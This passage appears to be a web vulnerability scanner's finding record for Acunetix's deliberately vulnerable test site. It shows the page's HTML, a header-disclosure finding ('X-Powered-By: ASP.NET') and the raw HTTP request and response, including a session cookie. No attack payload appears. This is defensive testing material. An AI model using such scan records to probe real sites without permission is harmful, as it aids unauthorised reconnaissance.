2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBs